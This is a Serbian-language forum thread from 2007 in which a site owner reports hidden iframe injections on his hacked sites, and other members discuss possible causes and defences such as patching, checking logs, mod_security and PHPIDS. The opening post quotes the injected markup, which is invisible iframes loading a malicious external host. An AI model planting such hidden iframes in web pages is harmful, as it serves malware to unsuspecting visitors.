Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima |
|
Alati teme | Način prikaza |
|
05. 06. 2007. | #1 |
profesionalac
Professional
|
Hackovanje i <iframe>
Nekoliko mojih sajtova je hakovano tako sto je ubacen skriveni iframe iframe tag a da nije bilo promene ostalog sadrzaja, sa namerom da sto duze ostane neprimecen, dok mi se desavalo i da obrisu celu stranicu i ostave iframe tagove.
Google me je konatktirao da je na jednoj stranici maliciozni kod koji posetioce moze da zarazi nekim virusom. Evo koda koji je ostao na jednoj od stranica: Kôd:
-->--><!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe> <iframe src='http://takesnames.info/st/go.php?sid=1' width=1 height=1 style='visibility: hidden;'></iframe> <iframe src='http://takesnames.info/st/go.php?sid=2' width=1 height=1 style='visibility: hidden;'></iframe> <iframe src='http://takesnames.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe><!-- ~ --> |
05. 06. 2007. | #2 |
član
Certified
Datum učlanjenja: 07.08.2005
Poruke: 67
Hvala: 15
0 "Hvala" u 0 poruka
|
Mislim da je u pitanju bot, koji ima pristup fajlovima na serveru i izmenama istih. Imao sam slučaj kod jednog klijenta da bot isto tako ubaci deo koda u sve stranice koje sadrže "index" u nazivu, čak i one neaktivne.
__________________
Online prodavnica rukotvorina |
05. 06. 2007. | #3 |
Psychedelictrance freak
Wrote a book
|
Cini mi se da je u tvom slucaju bot, a kako su ubacili ... hm ... ne mogu tacno reci dok ne vidim stranicu ali verovatno imas neki "persistent XSS" propust.
__________________
Testiranje bezbednosti web aplikacija |
05. 06. 2007. | #4 |
Nikola Denić
Sir Write-a-Lot
|
ako koristis smarty pogledaj da li nije malo zastareo
__________________
Do not ask yourself what the world needs. Ask yourself what makes you come alive, and then go do that. Because what the world needs is people who have come alive |
05. 06. 2007. | #5 |
Milan Cvejic
Wrote a book
|
Ivane, XSS se moze manifestovati samo uz akcije posetilaca.
Dok kao sto vidimo ovde, njemu je neko dodao kod na stranu Da lici na nekog bot-a, ali tu je sam kriv zato sto ne vodi racuna o greskama koje software koji on koristi mozda ima. Da nisi mozda koristio OScommerce?!? Pozdrav.
__________________
http://weevify.com Poslednja izmena od LiquidBrain : 05. 06. 2007. u 14:01. |
05. 06. 2007. | #6 |
Ivan Dilber
Sir Write-a-Lot
|
mislim da je postojao ovakav problem sa starijim verzijama Wordpressa, propust koji su botovi koristili da dodaju viruse.. taj se problem resavao apgrejdom..
inace, pogledaj apache log fajlove i pokusaj da snimis trenutak kad se prvi put pojavljuju zahtevi za te ifrejmove, a onda pogledaj par zahteva ispred toga ko je sta pozivao... trebalo bi da tako moze da se nasluti nacin kako su te uhakovali...
__________________
Leadership is the art of getting people to want to do what you know must be done. |
05. 06. 2007. | #7 |
Psychedelictrance freak
Wrote a book
|
@LiquidBrain
Malo ti je nejasan zakljucak, XSS se manifestuje prilikom posete korisnika ali takodje moze da postoji na stranici kao npr neki komentar na nekom busnom blog enginu ... zato sam i napisao "persistent XSS". Mada moze da bude i bilo sta drugo ali mi je ovaj tip napada prvi pao napamet zbog "bot" pristupa. O kom software-u je rec ?
__________________
Testiranje bezbednosti web aplikacija Poslednja izmena od Ivan : 05. 06. 2007. u 16:28. |
06. 06. 2007. | #8 |
Designer guy
Wrote a book
|
Isto (ili slično) se desilo i gomili drugih ljudi, pogledaj na Sheinom blogu. U glavnom došli su do zaključka da se dešava na Dreamhostovim serverima i Wordpress blogovima (ne nužno zajedno).
|
02. 07. 2007. | #9 |
novi član
Datum učlanjenja: 02.07.2007
Poruke: 2
Hvala: 0
0 "Hvala" u 0 poruka
|
Može li neko da mi kaže kako je najbolje zaštititi sajt od hakera....i koje su obaveze kuće koja hostuje u tom pogledu...u pitanju je domaća kuća za hosting...?
|
02. 07. 2007. | #10 |
Psychedelictrance freak
Wrote a book
|
Sto se tice host kompanije, ona mora da omoguci sigurnost svih servisa koje pruza: http, ftp, ssh, ..., i aplikacija koje daje korisnicima na koriscenje tipa: webmail, control panel, statistike, ... Sve ostalo je na tebi (osim ako drugacije nije dogovoreno, mada jos nisam cuo za to).
Da bi ti kao korisnik zastitio svoj sajt prvo trebas biti siguran da si zastitio svoj kod koji si pisao, zatim da imas poslednje sigurnosne zakrpe za aplikacije koje koristis, ... takodje mozes da zatrazis od hosting kompanije da instalira (ako vec nije) neki WAF (web application firewall) kao sto je mod_security, ili da implementiras IDS (intrusion detection system) kao sto je PHPIDS. Imas na mom blogu vise detalja o ovim stvarima, i bas sada (cim nadjem vremena) planiram da pocnem seriju textova o improvizacijama WAF-ova ...
__________________
Testiranje bezbednosti web aplikacija |
|
|
Slične teme | ||||
Tema | Početna poruka teme | Forum | Odgovori | Poslednja poruka |
Referenca na div koji se nalazi u iframe-u | centaur | (X)HTML, JavaScript, DHTML, XML, CSS | 10 | 10. 09. 2008. 17:33 |
[JS] HTML kod IFRAME-a | Nemanja Avramović | Sva početnička pitanja | 6 | 14. 03. 2008. 19:50 |
Iframe i JS | ivanhoe | (X)HTML, JavaScript, DHTML, XML, CSS | 5 | 19. 12. 2006. 21:45 |
cross-domain scripting i iframe | ivanhoe | (X)HTML, JavaScript, DHTML, XML, CSS | 0 | 06. 05. 2006. 00:12 |
javascript, iframe i Opera | ivanhoe | (X)HTML, JavaScript, DHTML, XML, CSS | 2 | 28. 04. 2006. 13:21 |